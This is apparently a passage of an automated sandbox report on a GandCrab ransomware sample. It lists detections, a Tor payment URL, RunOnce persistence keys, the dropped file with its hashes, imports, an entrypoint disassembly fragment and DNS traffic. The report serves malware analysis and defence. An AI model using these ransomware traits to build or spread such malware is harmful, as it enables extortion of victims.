39.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.3.wzltxa.exe.3a80000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
33.3.wzltxa.exe.2f00000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.3.wzltxa.exe.3640000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
33.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
13.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
31.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
28.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
28.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
28.3.wzltxa.exe.38a0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
30.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.mPNVrHIpyt.exe.f690000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
40.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.3.wzltxa.exe.3a00000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b	100%	Avira URL Cloud	malware
https://tox.chat/download.html	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipv4bot.whatismyipaddress.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ipv4bot.whatismyipaddress.com/r	wzltxa.exe, 0000000B.00000002.319600520.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/0	wzltxa.exe, 00000012.00000002.406611615.00000000012A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/6	wzltxa.exe, 0000000D.00000002.356925187.0000000000D13000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 00000027.00000002.605442747.00000000016F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/5	wzltxa.exe, 0000001F.00000002.546253684.0000000001488000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/u	mPNVrHIpyt.exe, 00000000.00000002.280964753.0000000001549000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/T	wzltxa.exe, 00000021.00000002.566573715.0000000000758000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/3	wzltxa.exe, 0000000D.00000002.356865636.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/S	wzltxa.exe, 0000000B.00000002.319600520.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/)	wzltxa.exe, 0000001C.00000002.510519508.0000000001098000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/pxV	wzltxa.exe, 00000016.00000002.443945557.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/.	wzltxa.exe, 0000001C.00000003.509113143.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000001C.00000002.510669459.00000000010D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b	mPNVrHIpyt.exe, 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, wzltxa.exe, 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	true	Avira URL Cloud: malware	unknown
http://ipv4bot.whatismyipaddress.com/K	mPNVrHIpyt.exe, 00000000.00000002.280964753.0000000001549000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/a	wzltxa.exe, 0000001F.00000002.546253684.0000000001488000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/E:	wzltxa.exe, 0000000F.00000002.384119850.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/%	wzltxa.exe, 0000000D.00000002.356865636.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.torproject.org/	mPNVrHIpyt.exe, 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, wzltxa.exe, 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/Z	mPNVrHIpyt.exe, 00000000.00000002.280964753.0000000001549000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/Y	wzltxa.exe, 00000012.00000002.406711705.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 00000012.00000003.405938163.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000001F.00000002.546525436.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/	wzltxa.exe, 00000027.00000002.605442747.00000000016F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tox.chat/download.html	mPNVrHIpyt.exe, 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, wzltxa.exe, 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	false	URL Reputation: safe	unknown
http://ipv4bot.whatismyipaddress.com/nxD	wzltxa.exe, 00000016.00000002.443945557.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	694572
Start date and time:	2022-09-01 00:06:24 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	mPNVrHIpyt.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@17/1@16/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99% (good quality ratio 95.1%) Quality average: 83.2% Quality standard deviation: 24.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 72 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:07:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce imsihyxywip "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:07:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce imsihyxywip "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:07:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce lwxsmttcgib "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:08:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce rbpjrvqzmfp "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:08:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce lldeowbcwli "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:08:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce mvsrloqetvq "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:08:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce pkxyauwkvet "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:08:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce lwxsmttcgib "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:08:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce rbpjrvqzmfp "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:09:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce lldeowbcwli "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:09:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce mvsrloqetvq "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:09:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce pkxyauwkvet "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:09:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce axlnhkgixlf "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:09:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce xjlfhrnjhfo "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:09:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ovikprhtlzq "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:09:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce jmfyvzwgtay "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:10:01	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce axlnhkgixlf "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:10:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce xjlfhrnjhfo "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:10:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ovikprhtlzq "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
00:10:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce jmfyvzwgtay "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Download File

Process:	C:\Users\user\Desktop\mPNVrHIpyt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	6.49012841585642
Encrypted:	false
SSDEEP:	1536:fZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:2d5BJHMqqDL2/Ovvdr
MD5:	EAC223A7EC1CF2E33BE569DB14A87A63
SHA1:	EEF79567F14954FC347B3AFE712C07A76AFCABE6
SHA-256:	5C516C9C18FD4D7BE54B4C2218CCCDD7EA0650E6564B782027241F7D2DF50BE9
SHA-512:	8B04471BADA08AF6A20713C13CA636FC8F5487EDDCCC15201C0E436C64D3D824C674DDD71DC9A2ECF541C731AF6C54057BE482114C2FA1FD4019FC60FB28BC07
Malicious:	true
Yara Hits:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This .=...im cannot be run in DOS mode....$....................}.....B.....B...........1.......Y...G.....~.....y.....\|....Rich...................PE..L....6.Z............................ K.......................................Z....... ....@.........................P...U............@.......................P.......................................................................................text...H........................... ..`.rdata..&q.......r..................@..@.data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.490132731956949
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mPNVrHIpyt.exe
File size:	71680
MD5:	cc7ae6e4c86f605aab66fbd04eef7997
SHA1:	8c7c23c91ccecf548c6f9df30b839b9b24d57095
SHA256:	95427e787bb623ba2d2ec51cb289ae579aea27a674d900f9aa239f6a034b05cc
SHA512:	767db43c1dbb486350eee49ccd58cdb4767cad3907795f24bf65f5aec52c9bee18854feeac2791c87523eea018a36b42260d0b83f9699fe332e3d5dec8a0e317
SSDEEP:	1536:0ZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:Ld5BJHMqqDL2/Ovvdr
TLSH:	82636C1DB2D1B293F1E396B9FAB57E25445D2D103B056BEB08A369F568120F16C3B703
File Content Preview:	MZ......................@...............................................!..L.!This Nk...xm cannot be run in DOS mode....$.........................}.......B.......B...............1.........Y.....G.......~.......y.......\|.....Rich....................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x10004b20
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH
Time Stamp:	0x5A9C3687 [Sun Mar 4 18:10:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8735e6cad23590d9b5b60978db488a28

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 4Ch
push 000003E8h
call dword ptr [1000A098h]
call 00007F8A7075054Fh
test eax, eax
je 00007F8A707508BAh
push 00000000h
call dword ptr [1000A168h]
push 00000000h
push 00000000h
push 00000000h
push 10002D30h
push 00000000h
push 00000000h
call dword ptr [1000A108h]
mov dword ptr [ebp-04h], eax
cmp dword ptr [ebp-04h], 00000000h
je 00007F8A707508DEh
push 00001388h
mov eax, dword ptr [ebp-04h]
push eax
call dword ptr [1000A080h]
cmp eax, 00000102h
jne 00007F8A707508BEh
push 00000000h
mov ecx, dword ptr [ebp-04h]
push ecx
call dword ptr [1000A094h]
mov edx, dword ptr [ebp-04h]
push edx
call dword ptr [1000A10Ch]
call 00007F8A707505E4h
call 00007F8A7074FFCFh
lea ecx, dword ptr [ebp-4Ch]
call 00007F8A70752267h
mov dword ptr [ebp-24h], 00000000h
mov dword ptr [ebp-20h], 00000000h
mov dword ptr [ebp-18h], 00000000h
mov dword ptr [ebp-28h], 00000000h
lea eax, dword ptr [ebp-20h]
push eax
lea ecx, dword ptr [ebp-24h]
push ecx
lea edx, dword ptr [ebp-28h]
push edx
lea eax, dword ptr [ebp-18h]
push eax
lea ecx, dword ptr [ebp-4Ch]
call 00007F8A707521E3h
mov dword ptr [ebp-2Ch], 00000000h
mov dword ptr [ebp-0Ch], 00000000h
mov ecx, dword ptr [ebp-18h]
call 00007F8A707507CDh

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[EXP] VS2013 build 21005
[RES] VS2013 build 21005
[LNK] VS2013 build 21005

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x10550	0x55	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x105a8	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0xaf4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x200	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8448	0x8600	False	0.4546991604477612	data	6.32052618210059	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x7126	0x7200	False	0.47765899122807015	data	6.1644872822657275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x12000	0xa84	0xc00	False	0.3056640625	data	3.538638851099626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x13000	0x4	0x200	False	0.033203125	data	0.04078075625387198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1e0	0x200	False	0.52734375	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15000	0xaf4	0xc00	False	0.7932942708333334	data	6.537931848954439	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x14060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	ReadFile, SetFilePointer, GetFileAttributesW, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
USER32.dll	BeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, wsprintfA, GetForegroundWindow, SetWindowLongW
GDI32.dll	TextOutW
ADVAPI32.dll	FreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
SHELL32.dll	ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
CRYPT32.dll	CryptStringToBinaryA, CryptBinaryToStringA
WININET.dll	InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
PSAPI.DLL	EnumDeviceDrivers, GetDeviceDriverBaseNameW

Exports

Name	Ordinal	Address
_ReflectiveLoader@0	1	0x10005ff0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2022 00:07:34.490466118 CEST	51139	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:07:34.510363102 CEST	53	51139	8.8.8.8	192.168.2.3
Sep 1, 2022 00:07:52.513761044 CEST	52955	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:07:52.533942938 CEST	53	52955	8.8.8.8	192.168.2.3
Sep 1, 2022 00:08:04.046449900 CEST	57134	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:08:04.065778017 CEST	53	57134	8.8.8.8	192.168.2.3
Sep 1, 2022 00:08:09.926047087 CEST	62050	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:08:09.944586039 CEST	53	62050	8.8.8.8	192.168.2.3
Sep 1, 2022 00:08:22.282254934 CEST	53848	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:08:22.303661108 CEST	53	53848	8.8.8.8	192.168.2.3
Sep 1, 2022 00:08:32.932132959 CEST	57571	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:08:32.951133013 CEST	53	57571	8.8.8.8	192.168.2.3
Sep 1, 2022 00:08:50.475862980 CEST	53305	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:08:50.495318890 CEST	53	53305	8.8.8.8	192.168.2.3
Sep 1, 2022 00:09:02.752767086 CEST	60749	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:09:02.773488998 CEST	53	60749	8.8.8.8	192.168.2.3
Sep 1, 2022 00:09:21.074116945 CEST	56949	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:09:21.092598915 CEST	53	56949	8.8.8.8	192.168.2.3
Sep 1, 2022 00:09:35.271372080 CEST	53844	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:09:35.293471098 CEST	53	53844	8.8.8.8	192.168.2.3
Sep 1, 2022 00:09:47.508217096 CEST	53466	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:09:47.530179977 CEST	53	53466	8.8.8.8	192.168.2.3
Sep 1, 2022 00:10:05.653143883 CEST	53428	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:10:05.674639940 CEST	53	53428	8.8.8.8	192.168.2.3
Sep 1, 2022 00:10:13.795104980 CEST	59820	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:10:13.813121080 CEST	53	59820	8.8.8.8	192.168.2.3
Sep 1, 2022 00:10:21.883244991 CEST	64595	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:10:21.902523041 CEST	53	64595	8.8.8.8	192.168.2.3
Sep 1, 2022 00:10:29.572328091 CEST	52079	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:10:29.593041897 CEST	53	52079	8.8.8.8	192.168.2.3
Sep 1, 2022 00:10:38.119400978 CEST	64823	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:10:38.138722897 CEST	53	64823	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 1, 2022 00:07:34.490466118 CEST	192.168.2.3	8.8.8.8	0x7d52	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
